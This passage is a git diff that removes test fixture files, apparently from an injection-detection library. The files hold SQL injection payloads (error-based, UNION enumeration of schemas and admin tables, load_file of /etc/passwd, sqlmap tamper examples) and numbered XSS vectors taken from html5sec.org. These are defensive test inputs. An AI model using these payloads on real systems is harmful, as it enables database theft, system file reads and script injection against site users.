1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'='
|
||||
1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'='
|
||||
1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'='
|
||||
1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'='
|
||||
1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'='
|
||||
1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'='
|
||||
1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'='
|
||||
1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'='
|
||||
1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'='
|
||||
1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'='
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr
|
||||
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW
|
||||
1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)#
|
||||
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))#
|
||||
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))#
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc
|
||||
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ
|
||||
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW
|
||||
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg
|
||||
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs
|
||||
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu
|
||||
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR
|
||||
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO
|
||||
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC
|
||||
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY
|
||||
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv
|
||||
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS
|
||||
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM
|
||||
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG
|
||||
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg
|
||||
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX
|
||||
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH
|
||||
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370
|
||||
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN
|
||||
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212
|
||||
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT
|
||||
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114
|
||||
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn
|
||||
1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068
|
||||
1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248
|
||||
1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064
|
||||
1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697
|
||||
1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805
|
||||
1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031
|
||||
EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x))
|
File diff suppressed because it is too large
|
@ -1,22 +0,0 @@
|
|||
#
|
||||
# Attacks pulled out of the examples from SQLMAP
|
||||
#
|
||||
|
||||
# https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py
|
||||
1%23%0AAND%23%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py
|
||||
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py
|
||||
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py
|
||||
1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py
|
||||
1+/*!00000AND+2>1*/--'
|
||||
|
||||
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py
|
||||
value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
|
||||
|
|
@ -1,56 +0,0 @@
|
|||
1' and '1' like '1
|
||||
1' and '1' like '0
|
||||
1' and 0 < (select length(@@version)) and '1' like '1
|
||||
1' own3d by 1
|
||||
1' order by 1#
|
||||
1' order by 15000#
|
||||
1' order by 2 #
|
||||
1' order by 4 #
|
||||
1' order by 3 #
|
||||
1' and 1=0 union all select 0x373134,0x373135#
|
||||
1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525#
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 #
|
||||
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 #
|
File diff suppressed because it is too large
|
@ -1,3 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/68
|
||||
|
||||
%3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F
|
|
@ -1,3 +0,0 @@
|
|||
# https://twitter.com/0x6D6172696F/status/394932823645503488
|
||||
# http://pastebin.com/jNPbhduR
|
||||
<p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">
|
|
@ -1,4 +0,0 @@
|
|||
#
|
||||
# https://github.com/angular/angular.js/pull/11290
|
||||
#
|
||||
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
|
|
@ -1,488 +0,0 @@
|
|||
#
|
||||
# http://html5sec.org
|
||||
# retreieved 2013-11-06
|
||||
|
||||
test 1 <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
|
||||
|
||||
# obsolete firefox 3
|
||||
#test 2 <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
|
||||
# obsolete firefox 3
|
||||
#test 3 <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
|
||||
test 4 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
|
||||
test 5 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
||||
|
||||
test 6 <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
|
||||
|
||||
test 7 <input onfocus=write(1) autofocus>
|
||||
|
||||
test 8 <input onblur=write(1) autofocus><input autofocus>
|
||||
|
||||
test 9 <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
|
||||
|
||||
test 10 <video poster=javascript:alert(1)//></video>
|
||||
|
||||
test 11 <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
|
||||
|
||||
test 12 <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
||||
|
||||
# opera only, only "DoS"
|
||||
# test 13 <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
|
||||
|
||||
# opera only, "DoS"
|
||||
# test 14 <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
|
||||
|
||||
test 15 <script>({0:#0=alert/#0#/#0#(0)})</script>
|
||||
|
||||
test 16 X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
|
||||
|
||||
test 17 <?xml-stylesheet href="javascript:alert(1)"?><root/>
|
||||
|
||||
test 18 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
|
||||
|
||||
# obsolete firefox 3
|
||||
# test 19 <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
|
||||
|
||||
test 20 <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
|
||||
|
||||
test 21 <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
||||
|
||||
test 22 <input onblur=focus() autofocus><input>
|
||||
|
||||
test 23 <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
|
||||
|
||||
test 24 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
|
||||
|
||||
test 25 <script src="#">{alert(1)}</script>;1
|
||||
|
||||
# obsolete firefox 4 and under
|
||||
# test 26 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
|
||||
|
||||
test 27 <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
|
||||
|
||||
test 28 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
|
||||
|
||||
test 29 <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
|
||||
|
||||
test 30 <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
|
||||
|
||||
test 31_1 <frameset onload=alert(1)>
|
||||
|
||||
test 31_2 <body onload=alert(1)>
|
||||
|
||||
test 32 <table background="javascript:alert(1)"></table>
|
||||
|
||||
test 33 <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
|
||||
|
||||
test 34 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=test.vml#xss></vmlframe>
|
||||
|
||||
test 35 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
||||
|
||||
test 36 <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
|
||||
|
||||
test 37 <!--<img src="--><img src=x onerror=alert(1)//">
|
||||
|
||||
test 38 <comment><img src="</comment><img src=x onerror=alert(1)//">
|
||||
|
||||
# obsolete, FF 3.6 and Opera 11
|
||||
#test 39_1 <![><img src="]><img src=x onerror=alert(1)//">
|
||||
|
||||
test 39_2 <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
|
||||
|
||||
test 40 <style><img src="</style><img src=x onerror=alert(1)//">
|
||||
|
||||
test 41 <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
|
||||
|
||||
test 42 <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
|
||||
|
||||
test 43 <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style>
|
||||
|
||||
test 44 <style>*[{}@import'test.css?]{color: green;}</style>X
|
||||
|
||||
test 45 <div style="font-family:'foo[a];color:red;';">XXX</div>
|
||||
|
||||
test 46 <div style="font-family:foo}color=red;">XXX</div>
|
||||
|
||||
test 47 <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
|
||||
|
||||
test 48 <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
|
||||
|
||||
test 49 <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
||||
|
||||
test 50 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
|
||||
test 51 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
|
||||
|
||||
test 52 <x style="behavior:url(test.sct)">
|
||||
|
||||
test 53_1 <xml id="xss" src="test.htc"></xml>
|
||||
|
||||
test 53_2 <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
||||
|
||||
test 54 <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script
|
||||
|
||||
test 55_1 <video><source onerror="alert(1)">
|
||||
test 55_2 <audio><source onerror="alert(1)">
|
||||
|
||||
test 56 <video onerror="alert(1)"><source></source></video>
|
||||
|
||||
#
|
||||
# Obsolete.. Firefox 3.6, Chrome 5, Safari 4
|
||||
#
|
||||
# test 57 <b <script>alert(1)//</script>0</script></b>
|
||||
|
||||
#
|
||||
# Obsolete Firefox 3.6
|
||||
#
|
||||
#test 58 <b><script<b></b><alert(1)</script </b></b>
|
||||
|
||||
test 59 <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
